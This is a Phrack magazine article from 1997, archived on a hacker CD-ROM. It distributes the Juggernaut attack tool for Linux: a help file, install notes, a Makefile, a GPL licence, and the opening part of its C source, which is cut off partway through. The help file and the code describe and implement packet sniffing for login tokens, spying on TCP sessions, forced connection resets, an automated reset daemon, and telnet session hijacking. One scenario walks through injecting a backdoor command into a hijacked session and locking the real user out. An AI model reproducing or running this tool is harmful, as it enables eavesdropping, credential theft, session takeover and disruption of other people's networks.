The Hacker's Encyclopedia 1998

home *** CD-ROM | disk | FTP | other *** search

/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / p50_06.txt < prev next >

Wrap

Text File | 2003-06-11 | 121.7 KB | 4,015 lines

.oO Phrack 50 Oo. Volume Seven, Issue Fifty 6 of 16 J U G G E R N A U T route|daemon9 a guild corporation production 1996/7 Please use the included extract.c utility to extract the files and then read the Install file. Any problems/comments mail me route@infonexus.com. A boot image is forthcoming that will allow a user to simply pop a disk into most any networked PC and turn it into a Juggernaut workstation. <++> Juggernaut/ClothLikeGauze/.help Juggernaut 1.0 Help File |-------- |Overview |-------- Juggernaut is a robust network tool for the Linux OS. It contains several modules offering a wide degree of functionality. Juggernaut has been tested successfully on several different Linux machines on several different networks. However, your mileage may vary depending on the network topologies of the environment (ie: Smart hubbing will kill much of the packet sniffing functionality...) and, to a lesser extent, the machine running Juggernaut. If something doesn't work, use a network debugger and figure out why... Juggernaut v1.0 was originally published in Phrack Magazine, issue 50; on April 9, 1997. Any serious problems/bugs or comments, please mail me: route@infonexus.com |--------------------- |Command Line Options |--------------------- juggernaut -h Quick help. juggernaut -H Dumps this help file. juggernaut -v By default, Juggernaut conveys error messages and other diagnostic information to the user. Specifying this option will cause Juggernaut to shut the hell up. Not recommended unless you know what you are doing. juggernaut -t xx [ juggernaut -t 5 ] This option specifies the network read timeout (which defaults to 10 seconds). This value reflects how long Juggernaut will wait for network traffic before giving up. In this case, it will wait 5 seconds. juggernaut -s TOKEN [ juggernaut -s login ] Dedicated sniffing mode. Juggernaut will drop to the background and examine all TCP packets looking for TOKEN. When TOKEN is located, it then isolates that TCP circuit and captures the next 16 (the default enticement factor) packets and logs them to a file. It then resets and continues sifting through TCP traffic looking for TOKEN. juggernaut -s TOKEN -e xx [ juggernaut -s daemon9 -e 1000 ] By specifying a larger enticement factor, you can capture more packets from a session. This time, after locating TOKEN, Juggernaut will capture 1000 packets before reseting. juggernaut This starts the program in standard mode. |------------- |Menu Options |------------- This is normal mode of operation for Juggernaut. This is where the magic happens, this is where the fun is. The program will examine all network traffic and add suitable TCP connections to the connection database (which is viewed with option 1). After at least one connection is in the database, you can start mucking around with it (connection construction and destruction are indicated by the appearance of the "+" or the "-" at the console). Note that connections involving a local interface may not show up (unless the localhost is dual-homed). One possible shortcoming of the program is the fact that it stores very little state information about connections in the database. Juggernaut collects whatever information it needs (and doesn't have) on the fly. As such, a quiet connection (no traffic) will elude hijacking and reseting. The benefit of this is the fact that the program does not have to tie itself up updating the shared memory segment with state every time a packet flies by. ?) Help This file. 0) Program information Dumps some stuff... 1) Connection database Dumps the current connection list and percent to capacity. Gives the option to wipe the database. 2) Spy on a connection Allows a user to spy on any connection in the database, with the option of logging the entire session to a file. 3) Reset a connection Allows the user to destroy any existing connection in the database. 4) Automated connection reset daemon Allows the user to setup an automated TCP RST daemon that will listen for connection request attempts from a specified source host (and optionally a destination host) and then reset them before they have a chance to complete. Requires a source IP address and optionally a destination address. This module prints a "*" to the console when a connection request attempt is attempted and denied... 5) Simplex connection hijack Allows the user to insert a command into a telnet based TCP stream. A short ACK storm ensues until the connection is subsequently reset. 6) Interactive connection hijack Allows the user to take over a session from a legitimate client. This desynchs the client from the server as the user takes over. The resulting ACK storm can be catastrophic and makes this interactive session prone to failure. If both of the target hosts are on an ethernet, expect a momunmental ACK storm. 7) Packet assembly module The Prometheus module. Construction of TCP, UDP, ICMP, and IP packets. The user has complete control over most of the header fields and can opt for generating a pseudo-random value. This module is far from done and needs some serious work. 8) Souper sekret option number eight Sshh. 9) Step down Quitter. |------------- |Suggested Use |------------- scenario 1: The passive observer menu options 1,2 The user is curious. She simply waits for connections to arrive and then passively observes them. Several invocations of Juggernaut may be started, each spying on a different connection. The user does not modify the flow of data or control. scenario 2: The malicious observer menu options 1,2,3 Same scenario as above, except the user alters the flow of control and opts to destroy connections at some point. scenario 3: The active observer menu options 1,2,3,5,(6) Same as the previous situations, however the user inserts data into the stream before destroying it. scenario 4: The imp menu options 1,2,3,4 The user is an impish devil and simply wants to cause trouble by setting up multiple ACRST daemons. scenario 5: The active observer with poisonous reverse menu options 1,2,4,5 The user waits until a client establishes a connection with a targeted server and then sets up the ACRST daemon to destroy all further connection-request attempts from the client. The user then spys on the connection, waiting for an opportune time to inject a hijack packet into the stream containing a backdooring command/pipeline. The client will then have her connection RST (after a brief ACK storm). If the client attempts to re-establish the connection with the server, she will be denied and likely think it is a transient network error. The user can then login into the server using the backdoor without fear of the client logging back in. Juggernaut is a Guild Corporation production, (c) 1996/7. [corporate persuasion through Internet terrorism] EOF <--> <++> Juggernaut/ClothLikeGauze/MANIFEST File Manifest for Juggernaut 1.0 ---------------------------- 1996/7 daemon9[guild|phrack|r00t] ---------------------------- ClothLikeGauze/ Docs .help Helpfile copyright The legal tie that binds. Install Installation instructions MANIFEST This file Makefile makefile NumberOneCrush/ Sources main.c main logic mem.c shared memory/semaphore functions menu.c menu functions prometheus.c packet assembly workshop module net.c socket/network functions surplus.c dumping ground Version history --------------- version a1: ----------- 11.30.96: Decided to start. Juggernaut framework and queue stuff. Used linked list queue originally to store connections. 12.01.96: Sniffing/spying/logging/RST stuff. 12.02-04: Not sure what I did here. I think I had a large turkey samich. 12.05.96: Redid memory abstract data type. Multithreaded. Implemented shared memory segment and semaphore for access control. Dumped ALL the dynamic memory allocation code. 12.06.96: Added packet assembly workshop hooks. Added curses. Removed curses. 12.07.96: No coding today. 12.08.96: Non-interactive hijacking completed. I think we're ready for beta now. version b1: ----------- 12.09.96: IP_HDRINCL crap added. 12.15-18: I was in NYC for the r00tparty. No coding then. 12.19.96: Added automated RST stuff. 12.20-27: No coding. 12.28.96: Started work on interactive hijacking. Damned ACK storms. 12.30.96: Started packet assembly module for reals. version b2: ----------- 01.25.97: Added network timeout logic. 01.26.97- 04.01.97: How can you possibly expect me to account for all that time? I went to Germany with alhambra for a networking summit and all over the US for other work, I was even in a Discovery special on IW... version 1.0: ------------ 04.02.97: Here it is. <--> <++> Juggernaut/ClothLikeGauze/ToDo Juggernaut ToDo list -------------------- + re-structure multitasking model to give the option of using multi-processing OR multi-threading + Create boot image + Support for ongoing connections + Support for healthy choice hotdog sequencer + Add arp cache seeding routine; as connections are added, MAC addresses will be added to the arp cache + Add support for different verbosity levels + Add support for IP and TCP options in packet assembly module + Better packet assembly support as a whole + Better code module plug-in support + much more robust packet sniffing module with support for multiple protocols + um, interactive hijacking that doesn't kill the client <--> <++> Juggernaut/ClothLikeGauze/copyright Juggernaut Copyright (c) 1996/7 by daemon9/route [Guild] (route@infonexus.com) Juggernaut source code, documentation, auxilliary programs, and executables are Copyright 1996/7 daemon9[guild]. All rights reserved. ---------------------------------------------------------------------- GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc. 675 Mass Ave, Cambridge, MA 02139, USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Library General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS Appendix: How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. <one line to give the program's name and a brief idea of what it does.> Copyright (C) 19yy <name of author> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. Also add information on how to contact you by electronic and paper mail. If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) 19yy name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. <signature of Ty Coon>, 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Library General Public License instead of this License. <--> <++> Juggernaut/Install Juggernaut 1.0 Installation Instructions ---------------------------------------- 1. Are you a fucking moron? If so, goto step 6; you are done. 2. Edit the Makefile. You may wish to change a few of the defines: USENAME: Define this to have Juggernaut attempt to resolve IP addresses into FQDNs... It's slower but more verbose this way. MULTI_P: Define this to use multi-process model of multi-tasking. THREAD: Define this to use multi-threaded model of multi-tasking. Be sure to also link in the pthreads library. Not implemented yet. IP_HDRINCL: Define this if you want/need to use the IP_HDRINCL socket option to build IP headers. NOHUSH: If defined, Juggernaut will notify the user audibly when a connection is added. GREED: If defined, Juggernaut will attempt to add any and ALL TCP based connections to the database. This is not recommended unless you know what you are doing... FASTCHECK: Define this to use a fast x86 assembler implementation of the IP checksum routine. May not work on all systems. That's why you have the option. 3. make all 4. yay. 5. ./juggernaut -h <--> <++> Juggernaut/Makefile # Juggernaut Makefile # 1996/7 daemon9[guild|phrack|r00t] CC = gcc #LIBS = -L/usr/lib -lpthread CFLAGS = -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 #-Wall DEFINES = -DMULTI_P -DNOHUSH -DUSENAME -DFASTCHECK DEFINES += #-DGREED #-DIP_HDRINCL #-DTHREAD OBJECTS = NumberOneCrush/main.o NumberOneCrush/menu.o\ NumberOneCrush/mem.o NumberOneCrush/prometheus.o\ NumberOneCrush/net.o NumberOneCrush/surplus.o .c.o: $(CC) $(CFLAGS) $(DEFINES) -c $< -o $@ all: JUGGERNAUT JUGGERNAUT: $(OBJECTS) $(CC) $(CFLAGS) $(DEFINES) $(OBJECTS) $(LIBS) -o juggernaut strip juggernaut clean: rm -f core juggernaut juggernaut.log.snif juggernaut.log.spy rm -rf NumberOneCrush/*.o <--> <++> Juggernaut/NumberOneCrush/main.c /* * * Juggernaut * Version b2 * * 1996/7 Guild productions * daemon9[guild|phrack|r00t] * * comments to route@infonexus.com * * This coding project made possible by a grant from the Guild corporation * * main.c - main control logic and program driver. Consists mainly of wrappers * to setup the main subfunctions. * * */ #include <string.h> #include <signal.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <ctype.h> #include <syslog.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/time.h> #include <sys/resource.h> #include <netinet/in.h> #ifdef THREAD #include <pthread.h> #endif #define MINIBUF 10 #define BUFSIZE 512 #define DEVICE "eth0" #define LOGFILE "./juggernaut.log.spy" char version[]="1.0\0"; int sigsentry=1; /* Signal sentry */ int ripsock=0; /* RIP socket */ int linksock=0; /* SOCK PACKET socket */ int hpid=0; /* hunter child PID */ int acrstpid=0; /* automated connection reset PID */ int netreadtimeout=10; /* Network read timeout in seconds */ int verbosity=1; /* Level of verbosity */ int enticementfactor=16; /* Enticing packets!@ */ time_t uptime=0; /* How long have we been running */ struct connectionInfo{ /* Simple tuple information */ unsigned long saddr; /* Source IP */ unsigned long daddr; /* Destination IP */ unsigned short sport; /* Source TCP Port */ unsigned short dport; /* Destination TCP Port */ }; /* * Main control logic. All the main logic is implemented in the switch * statement. */ int main(argc,argv) int argc; char *argv[]; { void usage(char *); void hunt(); void spy(); void rst(); void arst(); void pkta(); void simplexhijack(); void hijack(); void powerup(); void minit(); void mwipe(); void mmain(); void twitch(); void cleanexit(); void bloodhound(char *,int); void bookworm(); void dbmanip(); void jinfo(); int rawsock(); int tap(); float dump(); char buf[MINIBUF]={0}; char token[2*MINIBUF]={0}; int c; if(geteuid()||getuid()){ /* r00t? */ fprintf(stderr,"UID or EUID of 0 needed...\n"); exit(0); } /* Parse command-line arguments */ while((c=getopt(argc,argv,"s:e:t:vVhH"))!=-1){ switch(c){ case 's': /* dedicated sniffing mode */ strncpy(token,optarg,(sizeof(token)-1)); break; case 'e': /* Enticement factor (only valid with -s option) */ enticementfactor=atoi(optarg); break; case 't': /* Network alarm timeout */ netreadtimeout=atoi(optarg); break; case 'v': /* decrease verbosity */ verbosity=0; break; case 'V': /* version info */ jinfo(); exit(0); case 'h': /* Help is on the way my friend */ usage(argv[0]); exit(0); case 'H': /* Help is on the way my friend */ bookworm(); exit(0); default: usage(argv[0]); break; } } if(token[0]){ bloodhound(token,enticementfactor); exit(0); } mwipe(); minit(); /* Initial menu */ fprintf(stderr,"[cr]"); getchar(); signal(SIGINT,twitch); /* Catch these signals */ signal(SIGQUIT,twitch); ripsock=rawsock(); /* Setup RIP socket */ linksock=tap(DEVICE); /* Setup link socket */ powerup(); /* Setup shared memory and semaphore */ time(&uptime); /* Start the uptime timer */ hunt(); /* Start the connection hunter */ while(1){ mwipe(); mmain(); bzero(&buf,sizeof(buf)); fgets(buf,sizeof(buf),stdin); switch(buf[0]){ case '?': mwipe(); bookworm(); mwipe(); break; case '0': mwipe(); jinfo(); mwipe(); break; case '1': mwipe(); dbmanip(); mwipe(); break; case '2': /* Watch a connection. */ mwipe(); spy(); mwipe(); break; case '3': /* Kill a connection. */ mwipe(); rst(); mwipe(); break; case '4': /* Automated CRST daemon. */ mwipe(); arst(); mwipe(); break; case '5': /* Insert a single command. */ mwipe(); simplexhijack(); mwipe(); break; case '6': /* Hijack the session from the client */ mwipe(); hijack(); mwipe(); break; case '7': /* The packet assembly workshop */ mwipe(); pkta(); mwipe(); break; case '8': /* For future use. */ break; case '9': cleanexit(); default: continue; } } /* NOT REACHED */ return(0); } /* * chunt wrapper */ void hunt(){ #ifdef MULTI_P void spasm(); /* Handles the user defined signal */ void chunt(); switch((hpid=fork())){ case 0: /* Child */ signal(SIGUSR1,spasm); signal(SIGINT,SIG_IGN); /* Catch these signals */ signal(SIGQUIT,SIG_IGN); close(ripsock); /* Not needed in hunter */ chunt(); default: break; /* Parent continues */ case -1: if(verbosity)perror("(hunt) internal forking error [fatal]"); exit(1); } #endif #ifdef THREAD MULTIPLE THREADS OF EXECUTION IS NOT IMPLEMENTED YET. void chunt(); pthread_t hunter_t; pthread_create(&hunter_t,NULL,(void *)chunt(),(void *)NULL); #endif } /* * cspy wrapper */ void spy(){ void convulsion(); float dump(); struct connectionInfo *checkc(int); void cspy(struct connectionInfo *,FILE *); char buf[MINIBUF]; unsigned short val; struct connectionInfo *target; FILE *fp=0; dump(); while(1){ fprintf(stderr,"\nChoose a connection [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q')return; if(!(int)(val=atoi(buf)))continue; if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); else break; } fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >"); fgets(buf,sizeof(buf),stdin); if(toupper(buf[0])=='Y'){ if(!(fp=fopen(LOGFILE,"a+"))){ if(verbosity){ fprintf(stderr,"Cannot open file for logging, skipping operation.\n"); fprintf(stderr,"[cr]"); getchar(); } } } fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when done.\n"); signal(SIGINT,convulsion); sigsentry=1; cspy(target,fp); if(fp)fclose(fp); } /* * crst wrapper */ void rst(){ void convulsion(); float dump(); void crst(struct connectionInfo *); struct connectionInfo *checkc(int); char buf[MINIBUF]; unsigned short val; struct connectionInfo *target; dump(); while(1){ fprintf(stderr,"\nChoose a connection [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q')return; if(!(int)(val=atoi(buf)))continue; if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); else break; } signal(SIGINT,convulsion); crst(target); fprintf(stderr,"[cr]"); getchar(); } /* * acrst wrapper */ void arst(){ void convulsion(); float dump(); void acrst(unsigned long,unsigned long); char *hostLookup(unsigned long); unsigned long nameResolve(char *); char buf[4*MINIBUF]; unsigned long source,target; /* Setup addresing info */ fprintf(stderr,"\nEnter source IP [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q')return; if(!(source=nameResolve(buf))){ if(verbosity){ fprintf(stderr,"Name lookup failure: `%s`\n[cr]",buf); getchar(); } return; } fprintf(stderr,"\nEnter target IP (optional) [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='q')return; if(buf[0]==0x0a)target=0; /* target may be null, in this case, we only care where the connection is coming from */ else if(!(target=nameResolve(buf))){ if(verbosity){ fprintf(stderr,"Name lookup failure: %s\n[cr]",buf); getchar(); } return; } if(!target)fprintf(stderr,"Reseting all connection requests from:\t %s\n",hostLookup(source)); else fprintf(stderr,"Reseting all connection requests from:\t %s --> %s\n",hostLookup(source),hostLookup(target)); fprintf(stderr,"[cr]"); getchar(); acrst(source,target); } /* * dumpc wrapper */ float dump(){ float dumpc(); float usage=0; fprintf(stderr,"\nCurrent Connection Database:\n"); fprintf(stderr,"-------------------------------------------------\n"); fprintf(stderr,"ref # source target \n\n"); usage=dumpc(); fprintf(stderr,"-------------------------------------------------\n"); return usage; } /* * database manipulation routines go here.. */ void dbmanip(){ float dump(); void cleardb(); float usage=0; char buf[MINIBUF]; usage=dump(); if(usage)fprintf(stderr,"\nDatabase is %.02f%% to capacity.",usage); else fprintf(stderr,"\nDatabase is empty."); fprintf(stderr,"\n[c,q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='c'){ fprintf(stderr,"\nClear entire connection database? [y/N] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]=='y'){ cleardb(); fprintf(stderr,"\nConnection database cleared.\n[cr]"); getchar(); } } } /* * Juggernaut version and option information */ void jinfo(){ time_t current=0; fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version); fprintf(stderr,"\nJuggernaut compiled with the following options:\n"); #ifdef MULTI_P fprintf(stderr," Multi-processing\n"); #endif #ifdef NOHUSH fprintf(stderr," Audible notification\n"); #endif #ifdef USENAME fprintf(stderr," Use hostnames\n"); #endif #ifdef GREED fprintf(stderr," Greedy connections\n"); #endif #ifdef FASTCHECK fprintf(stderr," Fast IP checksuming\n"); #endif #ifdef IP_HDRINCL fprintf(stderr," IP header include\n"); #endif #ifdef THREAD fprintf(stderr," Multi-threading\n"); #endif time(¤t); fprintf(stderr,"Juggernaut has been running %.02f minutes\n",(difftime(current,uptime)/60)); fprintf(stderr,"[cr]"); getchar(); } /* * csimplexhijack wrapper */ void simplexhijack(){ void sputter(); float dump(); void csimplexhijack(struct connectionInfo *,char *); void cspy(struct connectionInfo *,FILE *); struct connectionInfo *checkc(int); char buf[MINIBUF]; char commandbuf[BUFSIZE]; unsigned short val; struct connectionInfo *target; dump(); while(1){ fprintf(stderr,"\nChoose a connection [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q')return; if(!(int)(val=atoi(buf)))continue; if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); else break; } if(ntohs(target->dport)!=23){ fprintf(stderr,"Hijacking only valid with telnet connections.\n"); fprintf(stderr,"[cr]"); getchar(); return; } fprintf(stderr,"Enter the command string you wish executed [q] >"); fgets(commandbuf,sizeof(commandbuf),stdin); if(commandbuf[0]==0x0a)return; fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n"); fprintf(stderr,"\nNOTE: This may cause an ACK storm until client is RST.\n"); signal(SIGINT,sputter); sigsentry=1; cspy(target,0); csimplexhijack(target,commandbuf); fprintf(stderr,"[cr]"); getchar(); } /* * chijack wrapper */ void hijack(){ void sputter(); float dump(); void chijack(struct connectionInfo *); void cspy(struct connectionInfo *,FILE *); struct connectionInfo *checkc(int); char buf[MINIBUF]; unsigned short val; struct connectionInfo *target; dump(); while(1){ fprintf(stderr,"\nChoose a connection [q] >"); fgets(buf,sizeof(buf),stdin); if(buf[0]==0x0a||buf[0]=='q')return; if(!(int)(val=atoi(buf)))continue; if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); else break; } if(ntohs(target->dport)!=23){ fprintf(stderr,"Hijacking only valid with telnet connections.\n"); fprintf(stderr,"[cr]"); getchar(); return; } fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n"); fprintf(stderr,"\nNOTE: This will cause an ACK storm and desynch the client until the connection is RST.\n"); signal(SIGINT,sputter); sigsentry=1; cspy(target,0); sigsentry=1; chijack(target); fprintf(stderr,"[cr]"); getchar(); } /* * Prometheus wrapper (packet assembly workshop) */ void pkta(){ void mpkta(); void 